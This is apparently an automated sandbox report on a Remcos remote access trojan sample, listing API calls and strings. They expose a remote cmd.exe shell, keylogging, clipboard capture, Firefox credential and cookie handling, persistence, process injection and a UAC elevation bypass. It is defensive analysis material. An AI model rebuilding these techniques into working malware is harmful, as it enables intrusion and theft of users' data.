                                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                              • String ID:
                              • API String ID: 1170566393-0
                              • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                              • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                              • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                              • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                              • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                              • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                              • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                              APIs
                              • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                              • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                              • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                              • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: send
                              • String ID:
                              • API String ID: 2809346765-0
                              • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                              • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                              • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                              • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: recv
                              • String ID:
                              • API String ID: 1507349165-0
                              • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                              • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                              • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                              • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 00407CB9
                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                              • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                              • DeleteFileA.KERNEL32(?), ref: 00408652
                                • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                              • Sleep.KERNEL32(000007D0), ref: 004086F8
                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                              • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                              • API String ID: 1067849700-181434739
                              • Opcode ID: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
                              • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                              • Opcode Fuzzy Hash: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
                              • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                              APIs
                              • __Init_thread_footer.LIBCMT ref: 004056E6
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              • __Init_thread_footer.LIBCMT ref: 00405723
                              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                              • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                              • CloseHandle.KERNEL32 ref: 00405A23
                              • CloseHandle.KERNEL32 ref: 00405A2B
                              • CloseHandle.KERNEL32 ref: 00405A3D
                              • CloseHandle.KERNEL32 ref: 00405A45
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                              • API String ID: 2994406822-18413064
                              • Opcode ID: c42f28ba644b97e37895e1f3ee2c7c884f8e483c3f5d678ab53032e062026d85
                              • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                              • Opcode Fuzzy Hash: c42f28ba644b97e37895e1f3ee2c7c884f8e483c3f5d678ab53032e062026d85
                              • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                              APIs
                              • GetCurrentProcessId.KERNEL32 ref: 00412106
                                • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                              • CloseHandle.KERNEL32(00000000), ref: 00412155
                              • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                              • API String ID: 3018269243-13974260
                              • Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                              • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                              • Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                              • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                              • FindClose.KERNEL32(00000000), ref: 0040BBC9
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                              • FindClose.KERNEL32(00000000), ref: 0040BD12
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                              • API String ID: 1164774033-3681987949
                              • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                              • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                              • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                              • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                              APIs
                              • OpenClipboard.USER32 ref: 004168C2
                              • EmptyClipboard.USER32 ref: 004168D0
                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                              • GlobalLock.KERNEL32(00000000), ref: 004168F9
                              • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                              • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                              • CloseClipboard.USER32 ref: 00416955
                              • OpenClipboard.USER32 ref: 0041695C
                              • GetClipboardData.USER32(0000000D), ref: 0041696C
                              • GlobalLock.KERNEL32(00000000), ref: 00416975
                              • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                              • CloseClipboard.USER32 ref: 00416984
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                              • String ID: !D@
                              • API String ID: 3520204547-604454484
                              • Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                              • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                              • Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                              • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                              • FindClose.KERNEL32(00000000), ref: 0040BDC9
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                              • FindClose.KERNEL32(00000000), ref: 0040BEAF
                              • FindClose.KERNEL32(00000000), ref: 0040BED0
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$Close$File$FirstNext
                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                              • API String ID: 3527384056-432212279
                              • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                              • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                              • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                              • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                              • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                              • API String ID: 3756808967-1743721670
                              • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                              • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                              • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                              • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0$1$2$3$4$5$6$7$VG
                              • API String ID: 0-1861860590
                              • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                              • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                              • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                              • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                              APIs
                              • _wcslen.LIBCMT ref: 00407521
                              • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Object_wcslen
                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                              • API String ID: 240030777-3166923314
                              • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                              • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                              • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                              • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                              APIs
                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                              • GetLastError.KERNEL32 ref: 0041A7BB
                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                              • String ID:
                              • API String ID: 3587775597-0
                              • Opcode ID: 8be6c0db88263c078c4d0e26e1b320dd21e80ff956e73d25d1154f48fd66f17a
                              • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                              • Opcode Fuzzy Hash: 8be6c0db88263c078c4d0e26e1b320dd21e80ff956e73d25d1154f48fd66f17a
                              • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                              • FindClose.KERNEL32(00000000), ref: 0040C47D
                              • FindClose.KERNEL32(00000000), ref: 0040C4A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                              • API String ID: 1164774033-405221262
                              • Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                              • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                              • Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                              • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                              APIs
                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                              • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                              • String ID:
                              • API String ID: 2341273852-0
                              • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                              • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                              • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                              • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Find$CreateFirstNext
                              • String ID: 8SG$PXG$PXG$NG$PG
                              • API String ID: 341183262-3812160132
                              • Opcode ID: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
                              • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                              • Opcode Fuzzy Hash: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
                              • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                              APIs
                              • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                              • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                              • GetKeyState.USER32(00000010), ref: 0040A433
                              • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                              • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A461
                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                              • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                              • String ID:
                              • API String ID: 1888522110-0
                              • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                              • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                              • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                              • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                              APIs
                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                              • GetProcAddress.KERNEL32(00000000), ref: 00414271
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressCloseCreateLibraryLoadProcsend
                              • String ID: SHDeleteKeyW$Shlwapi.dll
                              • API String ID: 2127411465-314212984
                              • Opcode ID: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
                              • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                              • Opcode Fuzzy Hash: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
                              • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                              APIs
                                • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
